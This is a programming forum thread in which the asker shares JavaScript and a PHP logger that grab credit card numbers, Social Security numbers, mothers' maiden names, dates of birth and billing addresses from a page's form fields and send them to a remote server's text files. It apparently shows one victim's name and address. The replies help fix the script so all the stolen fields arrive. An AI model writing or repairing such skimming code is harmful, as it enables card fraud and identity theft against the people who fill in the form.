I am sending a GET request from a image added to the document via JavaScript. This request is sent to to a PHP server, PHP code as follows:
<?php
if (!$_GET['token']) {
return;
}
if (file_exists($_GET['token'].'.txt')) {
$fh = fopen($_GET['token'].'.txt', 'a');
fwrite($fh, json_encode($_GET)."\n==============================\n");
} else {
$fh = fopen($_GET['token'].'.txt', 'w');
fwrite($fh, json_encode($_GET)."\n==============================\n");
}
fclose($fh);
return;
?>
The issue is when I complete the GET request the PHP server only receives the GET parameters up to the billing_address_2 when there are many more parameters being sent by the image in the document. Below is the request the Apache PHP server receives:
/save-data.php?token=1632376762131.3433&credit_card_id=34&expiration_date=02/23&card_holder_name=Ishmael J Roth&billing_address=3904 E Oak Pl&billing_address_2=Apt
You can see there are more GET parameters in the image being added to the document by the JavaScript in the JS code below:
document.body.innerHTML = `<img onl oad="submitCCForm()" src="https://example-domain.com/save-data.php?token=${ encodeURI(window.localStorage.token) }&credit_card_number=${ encodeURI(document.querySelector('[name=\"credit_card_number\"]').value) }&expiration_date=${ encodeURI(document.querySelector('[name=\"expiration_time\"]').value) }&card_holder_name=${ encodeURI(document.querySelector('[name=\"card_holder_name\"]').value) }&billing_address=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[1] }&billing_address_2=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[2] }&billing_address_3=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[3].replaceAll(',', '-') }&billing_address_4=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[4] }&mothers_maiden_name=${ encodeURI(document.querySelector('#mmn').value) }&=&social_security=${ encodeURI(document.querySelector('[name=\"social_security\"]').value) }&dob=${ encodeURI(document.querySelector('[name=\"dob\"]').value) }&billing_phone=${ encodeURI(document.querySelector('[name=\"billing_phone\"]').value) }" />`
Please share a solution to have the full get parameters sent in the image request to be received by the server and saved to the file, rather than the server stopping at the GET parameter billing_address_2.
CodePudding user response:
You are using unencoded GET parameter!
expiration_date=02/23
That is why you are required to urlencode
all parameters...
CodePudding user response:
Looking at the URL you mentioned in comments, it seems like the #
in billing_address_2, having the value Apt #253
, is causing the problem. The portion after #
is considered part of URL hash, not query string.
Having said that, you are supposed to use encodeURIComponent
to encode individual query string parameter values instead of encodeURI
. The difference is explained here.